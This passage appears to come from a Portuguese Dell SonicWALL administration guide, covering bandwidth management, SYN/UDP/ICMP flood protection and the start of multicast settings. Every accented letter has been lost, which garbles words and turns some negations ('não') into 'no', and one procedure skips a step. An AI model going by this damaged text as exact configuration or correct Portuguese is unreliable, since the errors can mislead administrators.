Habilitar um objeto de largura de banda em um objeto de ao
Para habilitar um objeto de largura de banda em um objeto de ao:
Etapa 1 No dispositivo de segurana Dell SonicWALL, v para Firewall > Objetos de ao.
Etapa 2 Se criar um novo objeto de ao, na lista Nome da ao, insira o nome do objeto de ao.
Etapa 3 Na lista Ao, selecione Gerenciamento de largura de banda.
Etapa 4 Na lista Mtodo de agregao da largura de banda, selecione o mtodo de agregao de

largura de banda apropriado.
Etapa 5 Para habilitar o gerenciamento de largura de banda na direo de egresso, selecione a opo
Habilitar o gerenciamento de largura de banda egressa.
Etapa 6 Na lista Objeto de largura de banda, selecione o objeto de largura de banda para a direo
de egresso.
Etapa 7 Para habilitar o gerenciamento de largura de banda na direo de ingresso, selecione a opo
Habilitar o gerenciamento de largura de banda ingressa.
Etapa 8 Na lista Objeto de largura de banda, selecione o objeto de largura de banda para a direo
de ingresso.
Etapa 9 Para habilitar o controle do uso da largura de banda, selecione a opo Habilitar uso do
controle da largura de banda.

Definir limites de largura de banda de uma interface
Para definir os limites de largura de banda de uma interface:
Etapa 1 No dispositivo de segurana Dell SonicWall, acesse Rede > Interfaces.

Etapa 2 Clique no boto Configurar da interface apropriada.
Etapa 4 Em Gerenciamento de largura de banda, selecione a opo Habilitar o limite de largura de

banda egressa da interface.
Etapa 5 Quando esta opo estiver selecionada, o trfego de egresso total na interface estar limitado
ao valor especificado na caixa Habilitar o limite de largura de banda ingressa da interface.
Quando esta opo no estiver selecionada, no ser definido um limite de largura de banda
ao nvel da interface, mas o trfego de egresso ainda pode ser formatado usando outras
opes.
Etapa 6 Na caixa Largura de banda egressa mxima da interface (kbps), insira a largura de banda
egressa mxima da interface (em quilobytes por segundo).
Etapa 7 Selecione a opo Habilitar o limite de largura de banda ingressa da interface.
Etapa 8 Quando esta opo estiver selecionada, o trfego de ingresso total estar limitado ao valor
especificado na caixa Largura de banda ingressa mxima da interface. Quando esta opo
no estiver selecionada, no ser definido um limite de largura de banda ao nvel da interface,
mas o trfego de ingresso ainda pode ser formatado usando outras opes.
Etapa 9 Na caixa Largura de banda ingressa mxima da interface (kbps), insira a largura de banda
ingressa mxima da interface (em quilobytes por segundo).

Atualizar o gerenciamento avanado da largura de banda

O gerenciamento avanado de largura de banda usa objetos de largura de banda como mtodo
de configurao. Os objetos de largura de banda so configurados em Firewall > Objetos de
largura de banda e podem, em seguida, ser habilitados em Regras de acesso.
A configurao tradicional do gerenciamento de largura de banda no compatvel com o
firmware SonicOS 6.2. Porm, para assegurar que os clientes podem manter suas
configuraes de rede atuais, os clientes podem usar o recurso Atualizao do gerenciamento
avanado de largura de banda quando instalarem o firmware SonicOS 6.2.
O recurso Atualizao avanada da largura de banda converte automaticamente todas as
configuraes ativas, vlidas e tradicionais de BWM para o modelo de design dos objetos de
largura de banda.
Na configurao tradicional de BWM, o mecanismo de BWM s afeta o trfego quando este
transmitido por meio da interface WAN primria ou da interface WAN de balanceamento de
carga ativa. O trfego que no passa por estas interfaces no sujeito ao gerenciamento de
largura de banda, independentemente das configuraes de Regra de acesso ou Regra de
aplicativo.
No gerenciamento avanado de largura de banda, o mecanismo de BWM pode impor
configuraes de gerenciamento de largura de banda em qualquer interface.
Durante o processo de atualizao do gerenciamento avanado de largura de banda, o
SonicOS converte as configuraes tradicionais de BWM para um objeto de largura de banda
padro e conecta-o com a regra de classificador original (Regra de acesso ou Regra de
aplicativo). O objeto de largura de banda padro gerado automaticamente herda todos os
parmetros de BWM das direes de ingresso e egresso.
Os dois grficos a seguir mostram as configuraes tradicionais de BWM. O grfico a seguir
depois das mesmas mostra os novos objetos de largura de banda que foram gerados
automaticamente durante o processo de atualizao do gerenciamento avanado de largura
de banda.
Este grfico mostra as configuraes tradicionais de Regra de acesso a partir da caixa de
dilogo Firewall > Regras de acesso > Configurar.

Este grfico mostra as configuraes tradicionais de Objeto de ao a partir da caixa de
dilogo Firewall > Objeto de ao > Configurar.
Este grfico mostra os quatro novos objetos de largura de banda que foram gerados automaticamente
durante o processo de atualizao do gerenciamento avanado de largura de banda. Estas
configuraes podem ser visualizadas na tela Firewall > Objetos de largura de banda.

Glossrio
Gerenciamento de largura de banda (BWM): Refere-se a qualquer um dos vrios algoritmos
ou mtodos usados para formatar ou controlar o trfego. A formatao refere-se geralmente
ao gerenciamento de trfego de sada, enquanto o controle refere-se geralmente ao
gerenciamento de trfego de entrada (tambm conhecido como controle de admisso).
Existem vrios mtodos diferentes de gerenciamento de largura de banda, incluindo vrias
tcnicas de enfileiramento e descarte, cada uma com seus prprios pontos fortes de design. A
Dell SonicWALL utiliza um mtodo de enfileiramento baseado em classe e em token para BWM
de entrada e de sada, bem como um mecanismo de descarte para determinados tipos de
trfego de entrada.
Largura de banda garantida: Uma porcentagem declarada do total de largura de banda
disponvel em uma interface que sempre ser concedida a uma determinada classe de trfego.
Aplicvel a BWM de entrada e de sada. A largura de banda total garantida em todas as regras
de BWM no pode exceder 100% do total de largura de banda disponvel. O SonicOS
Enhanced 5.0 e posterior melhora o recurso de gerenciamento de largura de banda para
fornecer funcionalidade de limitao de taxa. Agora voc pode criar polticas de trfego que
especificam taxas mximas para trfego de rede de camada 2, 3 ou 4. A largura de banda
garantida tambm pode ser definida para 0%.
BWM de ingresso: A capacidade para formatar a taxa na qual o trfego entra em uma
determinada interface. Para trfego TCP, a formatao real ocorre quando a taxa do fluxo de
ingresso pode ser ajustada pelo mecanismo de ajuste da janela TCP. Para trfego de UDP,
usado um mecanismo de descarte, uma vez que o UDP no tem controles de feedback nativos.
Largura de banda mxima: Uma porcentagem declarada do total de largura de banda
disponvel em uma interface que define a largura de banda mxima que ser permitida a uma
determinada classe de trfego. Aplicvel a BWM de entrada e de sada. Usar como mecanismo
de estrangulamento para especificar um limite de taxa de largura de banda. O recurso de
gerenciamento de largura de banda foi aprimorado para fornecer a funcionalidade de limitao
de taxa. Agora voc pode criar polticas de trfego que especificam taxas mximas para
trfego de rede de camada 2, 3 ou 4. Isso permite o gerenciamento de largura de banda em
casos em que o link de WAN primrio falhe para uma conexo secundria que no pode
gerenciar tanto trfego. A largura de banda mxima pode ser definida para 0% que impedir
todo o trfego.
BWM de egresso: Condicionar a taxa qual o trfego enviado para uma interface. O BWM
de sada usa um sistema de enfileiramento baseado em crdito (ou token) com 8 anis de
prioridade para servir diferentes tipos de trfego, como classificado pelas regras de acesso.
Prioridade: Uma dimenso adicional usada na classificao de trfego. O SonicOS usa oito
valores de prioridade (0 = mais alta, 7 = mais baixa) que compem a estrutura de fila usada
para BWM. As filas recebem manuteno por ordem de prioridade.
Enfileiramento: Para usar efetivamente a largura de banda disponvel em um link. As filas so
normalmente utilizadas para classificar e gerenciar separadamente o trfego aps ele ser
classificado.

Captulo 45
Configurar proteo contra inundao
Configuraes de firewall > Proteo contra

inundao
A pgina Configuraes de firewall > Proteo contra inundao permite visualizar
estatsticas em trfego de TCP atravs do dispositivo de segurana e gerenciar configuraes
de trfego de TCP. A pgina est dividida em quatro sees
Configuraes de TCP na pgina 708
Mtodos de proteo contra inundao SYN na pgina 709
Configurar a proteo contra inundao SYN de camada 3 na pgina 711
Configurar a proteo contra inundao SYN/RST/FIN de camada 2 - Lista negra MAC na
pgina 713
Configuraes UDP na pgina 714
Proteo contra inundao UDP na pgina 714
Proteo contra inundao ICMP na pgina 714
Estatsticas de trfego na pgina 715
Configurar proteo contra inundao | 707

Configuraes de TCP
A seo Configuraes de TCP permite:

Impor compatibilidade de TCP estrita com RFC 793 e RFC 1122 selecione para
garantir a compatibilidade estrita com vrias regras de tempo limite de TCP. Esta definio
maximiza a segurana do TCP, mas poder causar problemas com o recurso Escala de
janelas para os usurios do Windows Vista.
Habilitar imposio de handshake TCP exige um handshake de TCP de trs vias bem-
sucedido para todas as conexes TCP.
Habilitar imposio de soma de verificao de TCP se for calculada uma soma de
verificao do TCP invlida, o pacote ser descartado.
Habilitar tempo limite de handshake TCP O perodo de tempo limite (em segundos)
para um handshake TCP de trs vias completar sua conexo. Se o handshake TCP de trs
vias no complet-la no perodo de tempo limite, ele ser descartado.
Tempo limite de conexo TCP padro o tempo padro atribudo a regras de acesso
para trfego de TCP. Se uma sesso TCP estiver ativa por um perodo em excesso desta
configurao, a conexo TCP ser limpa pelo firewall. O valor padro de 15 minutos, o
valor mnimo de 1 minuto e o valor mximo de 999 minutos. Nota: A definio de
tempos limites muito longos tornar a reclamao de recursos obsoletos mais lenta e, em
casos extremos, poder levar exausto do cache de conexo.
Vida til mxima de segmento (segundos) determina o nmero de segundos durante
o qual qualquer pacote TCP vlido antes de expirar. Esta configurao tambm usada
para determinar a quantidade de tempo (calculada como duas vezes a Vida til mxima de

segmento ou 2MSL) que uma conexo TCP ativamente fechada permanece no estado
TIME_WAIT para garantir que a troca adequada de FIN/ACK ocorreu para fechar a
conexo TCP de forma limpa.
Valor padro: 8 segundos
Valor mnimo: 1 segundo
Valor mximo: 60 segundos
Mtodos de proteo contra inundao SYN

A proteo contra inundao SYN/RST/FIN ajuda a proteger hosts atrs do firewall contra
ataques de Negao de Servio (DoS) ou DoS distribudos que tentam consumir os recursos
disponveis do host ao criar um dos seguintes mecanismos de ataque:
Enviar pacotes TCP SYN, RST ou FIN com endereos IP invlidos ou falsificados.
Criar nmeros em excesso de conexes TCP semiabertas.
As sees a seguir detalham alguns mtodos de proteo contra inundao SYN:
Proteo contra inundao SYN usando cookies sem estado na pgina 709
Mtodos de proteo contra inundao SYN especfico de camada na pgina 709
Compreender listas de observao SYN na pgina 710
Compreender um handshake TCP na pgina 710
Proteo contra inundao SYN usando cookies sem estado

O mtodo de proteo contra inundao SYN usado que comea com o SonicOS usa cookies
SYN sem estado, o que aumenta a confiabilidade da deteco de inundao SYN e tambm
melhora a utilizao de recursos no firewall. Com cookies SYN sem estado, o firewall no tem
de manter o estado em conexes semiabertas. Em vez disso, ele usa um clculo criptogrfico
(em vez de aleatoriedade) para chegar a SEQr.
Mtodos de proteo contra inundao SYN especfico de camada

O SonicOS fornece vrias protees contra inundaes SYN gerada a partir de dois ambientes
diferentes: redes confiveis (internas) ou no confiveis (externas). Os ataques de redes de
WAN no confiveis ocorrem geralmente em um ou mais servidores protegidos pelo firewall.
Os ataques de redes de LAN confiveis ocorrem em resultado de uma infeco por vrus dentro
de uma ou mais redes confiveis, gerando ataques em um ou mais hosts locais ou remotos.
Para fornecer uma defesa de firewall para ambos os cenrios de ataque, o SonicOS oferece
dois mecanismos de proteo contra inundao SYN separados em duas camadas diferentes.
Cada um rene e exibe estatsticas de inundao SYN e gera mensagens de log para eventos
de inundao SYN significativos.
Proxy SYN (camada 3) este mecanismo protege servidores na rede confivel de ataques
de inundao SYN baseados na WAN, usando uma implementao de proxy SYN para
verificar os clientes de WAN antes de enviar suas solicitaes de conexo para o servidor
protegido. Voc pode habilitar o proxy SYN somente em interfaces de WAN.
Lista negra SYN (camada 2) este mecanismo bloqueia dispositivos especficos da
gerao ou encaminhamento de ataques de inundao SYN. Voc pode habilitar a lista
negra SYN em qualquer interface.

Compreender listas de observao SYN
A arquitetura interna de mecanismos de proteo contra inundao SYN baseia-se em uma
nica lista de endereos Ethernet que so os dispositivos mais ativos enviando pacotes SYN
iniciais para o firewall. Esta lista denominada Lista de observao SYN. Uma vez que esta
lista contm endereos de Ethernet, o dispositivo rastreia todo o trfego SYN com base no
endereo do dispositivo encaminhando o pacote SYN, sem considerar o endereo IP de origem
ou de destino.
Cada entrada da lista de observao contm um valor denominado contagem de ocorrncias.
O valor da contagem de ocorrncias aumenta quando o dispositivo recebe um pacote SYN
inicial de um dispositivo correspondente. A contagem de ocorrncias diminui quando o
handshake de trs vias do TCP concludo. A contagem de ocorrncias de qualquer
dispositivo especfico geralmente igual ao nmero de conexes semiabertas pendentes
desde a ltima vez que o dispositivo reiniciou a contagem de ocorrncias. O padro do
dispositivo para redefinir uma contagem de ocorrncias de uma vez por segundo.
Os limites de registro, proxy SYN e lista negra SYN so comparados com os valores de
contagem de ocorrncias ao determinar se a alterao de uma mensagem de log ou um estado
necessria. Quando um ataque de inundao SYN ocorre, o nmero de conexes
semiabertas pendentes do dispositivo que encaminha os pacotes de ataque aumenta
substancialmente devido s tentativas de conexo falsificadas. Quando voc define os limites
de ataque corretamente, o fluxo de trfego normal produz alguns avisos de ataques, mas os
mesmos limites detectam e desviam os ataques antes de ocorrer uma degradao grave da
rede.
Compreender um handshake TCP

Um handshake TCP tpico (simplificado) comea com um iniciador enviando um pacote SYN
TCP com um nmero de sequncia de 32 bits (SEQi). O respondente envia ento um pacote
SYN/ACK confirmando a sequncia recebida enviando uma ACK igual a SEQi+1 e um nmero
de sequncia aleatrio (SEQr) de 32 bits. O respondente tambm mantm o estado
aguardando uma ACK do iniciador. O pacote de ACK do iniciador deve conter a seguinte
sequncia (SEQi+1), juntamente com uma confirmao da sequncia que recebeu do
respondente (enviando um ACK igual a SEQr+1). A troca tem o aspecto seguinte:
1. Iniciador -> SYN (SEQi=0001234567, ACKi=0) -> Respondente
2. Iniciador <- SYN/ACK (SEQr=3987654321, ACKr=0001234568) <- Respondente
3. Iniciador -> ACK (SEQi=0001234568, ACKi=3987654322) -> Respondente
Uma vez que o respondente tem de manter o estado em todas as conexes TCP semiabertas,
possvel a ocorrncia de depleo de memria se os SYNs surgirem mais rapidamente do
que a possibilidade de processamento ou eliminao pelo respondente. Uma conexo TCP
semiaberta no transitou para um estado estabelecido atravs da concluso do handshake de
trs vias. Quando o firewall est entre o iniciador e respondente, ele se torna efetivamente o
respondente, atribuindo um agente ou um proxy na conexo TCP ao respondente atual (host
privado) que est protegendo.

Configurar a proteo contra inundao SYN de camada 3
Para configurar os recursos de proteo contra inundao SYN, v para Proteo contra
inundao SYN de camada 3 Proxy SYN da janela Configuraes de firewall > Proteo
contra inundao que aparece conforme mostrado na figura abaixo.
Um modo de proteo contra inundao SYN o nvel de proteo que voc pode selecionar
para se defender contra sesses TCP semiabertas e transmisses de pacotes SYN de alta
frequncia. Esse recurso permite que voc defina trs nveis diferentes de proteo contra
inundao SYN:
Observar e reportar possveis inundaes SYN esta opo permite que o dispositivo
monitore o trfego SYN em todas as interfaces do dispositivo e registre atividade de
inundao SYN suspeita que exceda o limite de contagem de um pacote. O recurso no
ativa o proxy SYN no dispositivo e, assim, o dispositivo encaminha o handshake de trs
vias do TCP sem modificaes. Este o nvel menos invasivo de proteo contra
inundao SYN. Selecione esta opo se a sua rede no estiver em um ambiente de alto
risco.
Conexes cliente de WAN proxy quando h suspeita de ataque esta opo permite
que o dispositivo habilite o recurso de proxy SYN em interfaces de WAN quando o nmero
de tentativas de conexo incompletas por segundo vai alm de um limite especificado.
Esse mtodo garante que o dispositivo continuar a processar trfego vlido durante o
ataque e que o desempenho no ser prejudicado. O modo Proxy permanecer habilitado
at que todos os ataques de inundao SYN da WAN parem de ocorrer ou at que o
dispositivo coloque em lista negra todos eles usando o recurso de lista negra SYN. Este
nvel intermedirio de proteo contra inundao SYN. Selecione esta opo se a sua rede
foi alvo de ataques de inundao SYN de fontes internas ou externas.
Conexes cliente de WAN proxy sempre esta opo define o dispositivo para sempre
usar proxy SYN. Este mtodo bloqueia todos os pacotes SYN falsificados de passar pelo
dispositivo. Observe que esta uma medida de segurana extrema e faz com que o
dispositivo responder a rastreamento de portas em todas as portas TCP, pois o recurso de
proxy SYN fora o dispositivo a responder a todas as tentativas de conexo SYN de TCP.
Isso pode prejudicar o desempenho e gerar um falso positivo. Selecione esta opo
somente se a sua rede estiver em um ambiente de alto risco.

Configurar o limite de ataque SYN
As opes de configurao Limite de ataque SYN fornecem limites para a atividade de
Inundao SYN antes de o dispositivo descartar pacotes. O dispositivo rene estatsticas
sobre as conexes TCP de WAN, mantendo o controle das conexes de WAN mximas e
mdias mximas e incompletas por segundo. Fora destas estatsticas, o dispositivo sugere um
valor para o limite de inundao SYN. Observe as duas opes na seo:
Valor sugerido calculado com base nas estatsticas coletadas o limite de ataque
sugerido com base nas estatsticas de conexo de TCP da WAN.
Limite de ataque (tentativas de conexo incompletas/segundo) permite que voc defina
o limite para o nmero de tentativas de conexo incompletas por segundo antes de o
dispositivo descartar os pacotes em qualquer valor entre 5 e 999.999.
Configurar opes de proxy SYN

Quando o dispositivo aplica um proxy SYN a uma conexo TCP, ele responde ao pacote SYN
inicial com uma resposta SYN/ACK produzida, esperando a ACK em resposta antes de enviar
a solicitao de conexo para o servidor. Os dispositivos que atacam com pacotes de
inundao SYN no respondem resposta SYN/ACK. O firewall identifica-os pela falta deste
tipo de resposta e bloqueia as suas tentativas de conexo falsificadas. O proxy SYN fora o
firewall a produzir uma resposta SYN/ACK sem saber como o servidor responder s opes
de TCP normalmente fornecidas em pacotes SYN/ACK.
Para fornecer mais controle sobre as opes enviadas para clientes de WAN quando no modo
Proxy SYN, voc pode configurar os dois objetos seguintes:
SACK (Confirmao seletiva) este parmetro controla se a opo ACK seletiva est
habilitada. Com SACK habilitada, um pacote ou uma srie de pacote pode ser
descartado(a) e o que recebido informa o remetente que dados foram recebidos e onde
podero existir falhas nos dados.
MSS (Tamanho mnimo de segmento) isto define o limite do tamanho de segmentos de
TCP, impedindo que um segmento que muito grande seja enviado para o servidor de
destino. Por exemplo, se o servidor um gateway IPsec, ele poder precisar limitar o MSS
que recebeu para fornecer espao para cabealhos de IPSec ao enviar trfego por tnel.
O firewall no pode prever o valor MSS enviado ao servidor quando ele responde ao
pacote SYN produzido durante a sequncia de proxy. Sendo possvel controlar o tamanho
de um segmento, permite controlar o valor de MSS fabricado enviado para os clientes de
WAN.
A regio de limite do proxy SYN contm as seguintes opes:
Todos os servidores LAN/DMZ oferecem suporte opo TCP SACK esta caixa de
seleo habilita a opo ACK seletiva quando um pacote pode ser descartado e o
dispositivo de recepo indica os pacotes que recebeu. Marque esta caixa de seleo
somente se souber que todos os servidores abrangidos pelo firewall acessados a partir da
WAN suportam a opo SACK.
Limitar MSS enviado aos clientes de WAN (quando as conexes tm proxy) permite
que voc insira o valor de tamanho do segmento mnimo e mximo. Se voc especificar
um valor de substituio para o padro de 1460, isso indica que um segmento desse
tamanho ou menor ser enviado para o cliente no cookie SYN/ACK. A configurao deste
valor para um valor muito baixo pode diminuir o desempenho quando o Proxy SYN estiver
sempre habilitado. A configurao deste valor para um valor muito elevado pode
interromper as conexes se o servidor responder com um valor MSS menor.
Mximo de MSS TCP enviado a clientes de WAN. O valor do MSS. O padro 1460.

Nota Ao usar conexes de cliente WAN Proxy, lembre-se de definir estas opes de forma
prudente, uma vez que estas afetam somente as conexes quando ocorre uma inundao
SYN. Isto garante que as conexes legtimas possam prosseguir durante um ataque.
Registrar sempre os pacotes SYN recebidos. Registrar todos os pacotes SYN

recebidos.
Configurar a proteo contra inundao SYN/RST/FIN de camada 2 -

Lista negra MAC
O recurso de lista negra SYN/RST/FIN uma lista que contm os dispositivos que excederam
o limite do ataque lista negra SYN, RST e FIN. O dispositivo de firewall descarta os pacotes
enviados a partir de dispositivos em lista negra no comeo do processo de avaliao de
pacotes, ativando o firewall para lidar com maiores quantidades desses pacotes,
proporcionando uma defesa contra ataques com origem em redes locais, fornecendo tambm
proteo de segundo nvel para redes de WAN.
No possvel ter dispositivos na lista negra SYN/RST/FIN e na lista de observao
simultaneamente. Com a lista negra habilitada, o firewall remove da lista de observao os
dispositivos que ultrapassam o limite da lista negra e coloca-os na lista negra. Da mesma
forma, quando o firewall remove um dispositivo da lista de excluso, coloca-o de volta na lista
observao. Qualquer dispositivo cujo endereo MAC tenha sido colocado na lista negra ser
removido dela aproximadamente trs segundos aps a inundao proveniente do dispositivo
ter terminado.
A regio da lista negra SYN/RST/FIN contm as seguintes opes:

Limite para lista negra de inundao SYN/RST/FIN (SYNs/s) o nmero mximo de
pacotes SYN, RST e FIN permitidos por segundo. O padro 1.000. Este valor deve ser
superior ao valor limite do Proxy SYN, pois a lista negra tenta conter ataques locais mais
vigorosos ou ataques mais graves de uma rede WAN.
Habilitar lista negra de inundao SYN/RST/FIN em todas as interfaces esta caixa
de seleo habilita o recurso de lista negra em todas as interfaces no firewall.
Nunca colocar computadores de WAN na lista negra esta caixa de seleo
garante que os sistemas na WAN nunca sejam adicionados lista negra SYN.
Recomenda-se que esta opo no seja selecionada, pois poder interromper o
trfego para e das portas WAN do firewall.
Sempre permitir o trfego de gerenciamento do SonicWall esta caixa de seleo
faz com que o trfego IP de um dispositivo bloqueado que tem como alvo os endereos
IP de WAN do firewall no seja filtrado. Isto permite que o trfego de gerenciamento e
os protocolos de roteamento mantenham a conectividade por meio de um dispositivo
bloqueado.

Proteo contra DDOS de WAN (Inundaes no-TCP)
O painel Proteo contra DDOS de WAN (Inundaes no-TCP) um recurso que foi
substitudo por Proteo contra inundao UDP e Proteo contra inundao ICMP
conforme descrito nas sees a seguir.
Dell SonicWALL recomenda que voc no use o recurso Proteo contra DDOS de WAN, e
sim Proteo contra inundao UDP e Proteo contra inundao ICMP.
Configuraes UDP
Tempo limite da conexo UDP padro (segundos) insira o nmero de segundos de tempo
ocioso que desejar permitir antes de as conexes UDP atingirem o tempo limite. Este valor
substitudo pelo tempo limite de conexo UDP que voc definir para regras individuais.
Proteo contra inundao UDP

Ataques de inundao UDP so um tipo de ataque de negao de servio (DoS). Eles so
iniciados enviando uma grande quantidade de pacotes UDP para portas aleatrias em um host
remoto. Como resultado, os recursos do sistema atacado sero consumidos atravs do
tratamento de pacotes de ataque, o que eventualmente faz com que o sistema fique
inacessvel por outros clientes.
A proteo contra inundao UDP da SonicWALL defende contra esses ataques usando um
mtodo de "ver e bloquear". O dispositivo monitora o trfego de UDP para um destino
especfico. Se a taxa de pacotes UDP por segundo exceder o limite permitido de um
determinado perodo de tempo, o dispositivo descarta pacotes UDP subsequentes para
proteo contra um ataque de inundao.
A passagem de pacotes UDP que so consulta DNS ou respostas para ou de um servidor DNS
configurado pelo dispositivo permitida, independentemente do estado da proteo contra
inundao UDP.
As seguintes configuraes definem a proteo contra inundao UDP:
Habilitar proteo contra inundao UDP habilita a proteo contra inundao UDP.
Limitar ataque de inundao UDP (pacotes UDP/s) a taxa de pacotes UDP por
segundo enviados para um host, intervalo ou sub-rede que aciona a proteo contra
inundao UDP.
Tempo de bloqueio do ataque de inundao UDP (s) aps o dispositivo detectar a taxa
de pacotes UDP que ultrapassem o limite de ataque para esse perodo de tempo, a
proteo contra inundao UDP ativada e o dispositivo iniciar o descarte dos pacotes
UDP subsequentes.
Lista de destino protegida de ataque de inundao UDP o objeto ou grupo de
endereo de destino que ser protegido de um ataque de inundao UDP.
Proteo contra inundao ICMP

A proteo contra inundao ICMP funciona de forma idntica proteo contra inundao
UDP, com a exceo do monitoramento de ataques de inundao ICMP. A nica diferena
que no h consultas DNS que tm permisso para ignorar a proteo contra inundao ICMP.
As seguintes configuraes definem a proteo contra inundao ICMP:
Habilitar proteo contra inundao ICMP habilita a proteo contra inundao ICMP.

Limitar ataque de inundao ICMP (pacotes ICMP/s) a taxa de pacotes ICMP por
segundo enviados para um host, intervalo ou sub-rede que aciona a proteo contra
inundao ICMP.
Tempo de bloqueio do ataque de inundao ICMP (s) aps o dispositivo detectar a
taxa de pacotes ICMP que ultrapassem o limite de ataque para esse perodo de tempo, a
proteo contra inundao ICMP ativada e o dispositivo iniciar o descarte dos pacotes
ICMP subsequentes.
Lista de destino protegida de ataque de inundao ICMP o objeto ou grupo de
endereo de destino que ser protegido de um ataque de inundao ICMP.
Estatsticas de trfego
A pgina Firewall > Proteo contra inundao fornece as seguintes estatsticas de trfego:
Estatsticas de trfego TCP na pgina 715
Estatsticas de trfego UDP na pgina 716
Estatsticas de trfego ICMP na pgina 717
Estatsticas de trfego TCP

A tabela Estatsticas de trfego TCP fornece estatsticas sobre o seguinte:
Conexes abertas incrementado quando um iniciador de conexo TCP envia um SYN
ou um respondente de conexo TCP recebe um SYN.
Conexes fechadas incrementado quando uma conexo TCP fechada depois de o
iniciador e o respondente terem enviado um FIN e recebido uma ACK.
Conexes recusadas incrementado quando um RST encontrado e o respondente est
em um estado SYN_RCVD.
Conexes anuladas incrementado quando um RST encontrado e o respondente est
em um estado que no SYN_RCVD.
Total de pacotes TCP incrementado com cada pacote TCP processado.
Pacotes validados passados incrementado de acordo com as seguintes condies:
Quando um pacote TCP passa na validao da soma de verificao (enquanto a
validao da soma de verificao do TCP estiver habilitada).
Quando um pacote SYN vlido encontrado (enquanto a proteo contra inundao
SYN estiver habilitada).
Quando um cookie SYN for validado com xito em um pacote com o sinalizador ACK
definido (enquanto a proteo contra inundao SYN estiver habilitada).
Pacotes malformados descartados incrementado de acordo com as seguintes
condies:
Quando houver falha na validao da soma de verificao do TCP (enquanto a
validao da soma de verificao do TCP estiver habilitada).
Quando a opo SACK permitida do TCP (Confirmao seletiva, consulte RFC1072)
for encontrada, mas o comprimento da opo calculado for incorreto.
Quando a opo MSS do TCP (tamanho mximo do segmento) for encontrada, mas o
comprimento da opo calculado for incorreto.
Quando os dados da opo SACK do TCP forem calculados para serem menores do
que o mnimo de 6 bytes ou o mdulo incongruente com o tamanho do bloco de 4 bytes.
Quando o comprimento da opo TCP for considerado invlido.

Quando o comprimento do cabealho TCP for calculado para ser menor do que o
mnimo de 20 bytes.
Quando o comprimento do cabealho TCP for calculado para ser maior do que o
comprimento de dados do pacote.
Pacotes de sinalizador invlidos descartados incrementado de acordo com as
seguintes condies:
Quando recebido um pacote que no seja SYN que possa ser localizado no cache
de conexo (enquanto a proteo contra inundao SYN estiver desabilitada).
Quando um pacote com sinalizadores que no SYN, RST+ACK ou SYN+ACK for
recebido durante o estabelecimento da sesso (enquanto a proteo contra inundao
SYN estiver habilitada).
A varredura XMAS de TCP ser registrada se o pacote tiver os sinalizadores FIN,
URG e PSH definidos.
A varredura FIN de TCP ser registrada se o pacote tiver o sinalizador FIN definido.
A varredura Null de TCP ser registrada se o pacote no tiver nenhum sinalizador
definido.
Quando um novo incio de conexo de TCP tentado com algo que no apenas o
sinalizador SYN definido.
Quando um pacote com o sinalizador SYN definido for recebido dentro de uma sesso
TCP estabelecida.
Quando um pacote sem o sinalizador ACK definido for recebido dentro de uma sesso
TCP estabelecida.
Pacotes de sequncia invlidos descartados incrementado de acordo com as
seguintes condies:
Quando um pacote em uma conexo estabelecida for recebido quando o nmero de
sequncia for menor a sequncia no confirmada mais antiga da conexo.
Quando um pacote em uma conexo estabelecida for recebido quando o nmero de
sequncia for superior sequncia no confirmada mais antiga da conexo + o ltimo
tamanho da janela anunciado da conexo.
Pacotes de confirmao invlidos descartados incrementado de acordo com as
seguintes condies:
Quando um pacote recebido com o sinalizador ACK definido e com nenhum
sinalizador RST ou SYN definido, mas o cookie de SYN considerado invlido
(enquanto a proteo contra inundao SYN estiver habilitada).
Quando o valor ACK de um pacote (ajustado pelo deslocamento da aleatoriedade do
nmero de sequncia) for inferior ao nmero de sequncia no confirmado mais antigo
da conexo.
Quando o valor ACK de um pacote (ajustado pelo deslocamento da aleatoriedade do
nmero de sequncia) for superior ao nmero de sequncia seguinte esperado da
conexo.
Estatsticas de trfego UDP

A tabela Estatsticas de trfego UDP fornece estatsticas sobre o seguinte:
Conexes abertas
Conexes fechadas
Total de pacotes UDP incrementado com cada pacote UDP processado.

Pacotes validados passados incrementado de acordo com as seguintes condies:
Quando um pacote UDP passa na validao da soma de verificao (enquanto a
validao da soma de verificao do UDP estiver habilitada).
Pacotes malformados descartados incrementado de acordo com as seguintes
condies:
Quando houver falha na validao da soma de verificao do UDP (enquanto a
validao da soma de verificao do UDP estiver habilitada).
Quando o comprimento do cabealho UDP for calculado para ser maior do que o
comprimento de dados do pacote.
Inundaes UDP em andamento o nmero de dispositivos individuais de
encaminhamento que esto atualmente ultrapassando o limite de ataque de inundao
UDP.
Total de inundaes UDP detectadas o nmero total de eventos nos quais um
dispositivo de encaminhamento excedeu o limite de ataque de inundao UDP.
Total de pacotes de inundao UDP recusados o nmero total de pacotes descartados
devido deteco do ataque de inundao UDP.
Estatsticas de trfego ICMP

A tabela Estatsticas de trfego ICMP fornece as mesmas categorias de informaes que as
Estatsticas de trfego UDP na pgina 716, exceto para ataques de inundao ICMP em vez
de ataques de inundao UDP.

Captulo 46
Definir configuraes de difuso seletiva
do firewall
Configuraes de firewall > Difuso seletiva

A difuso seletiva de IP um mtodo de envio de um pacote de Protocolo de Internet (IP)
simultaneamente para vrios hosts. A difuso seletiva adequada ao segmento de rpido
crescimento de trfego da Internet: apresentaes multimdia e videoconferncia. Por
exemplo, um nico host transmitindo um fluxo de udio ou vdeo e dez hosts que desejam
receber esse fluxo. Em difuso seletiva, o host de envio transmite um pacote de IP nico com
um endereo especfico de difuso seletiva e os 10 hosts simplesmente precisam ser
configurados para escutar pacotes direcionados para esse endereo para receber a
transmisso. A difuso seletiva um mecanismo de comunicao de IP de ponto a multiponto
que opera em um modo sem conexo: os hosts recebem transmisses de difuso seletiva
"sintonizando-se" a elas, um processo semelhante sintonizao de uma rdio.
Definir configuraes de difuso seletiva do firewall | 719

A pgina Configuraes de firewall > Difuso seletiva permite gerenciar o trfego de difuso
seletiva no firewall.
Rastreamento de difuso seletiva

Esta seo fornece tarefas de configurao para Rastreamento de difuso seletiva.
Habilitar difuso seletiva esta caixa de seleo est desabilitada por padro. Selecione
esta caixa de seleo para suportar trfego de difuso seletiva.
Solicitar relatrios de associao IGMP para encaminhamento de dados de difuso
seletiva esta caixa de seleo est habilitada por padro. Selecione esta caixa de
seleo para melhorar o desempenho, regulando dados de difuso seletiva a serem
encaminhados somente para interfaces unidas em um endereo de grupo de difuso
seletiva usando IGMP.
Tempo limite de entrada da tabela de estados de difuso seletiva (minutos) este
campo tem um padro de 5. O intervalo de valor para este campo de 5 a 60 (minutos).
Atualize o valor do temporizador padro de 5 nas seguintes condies:
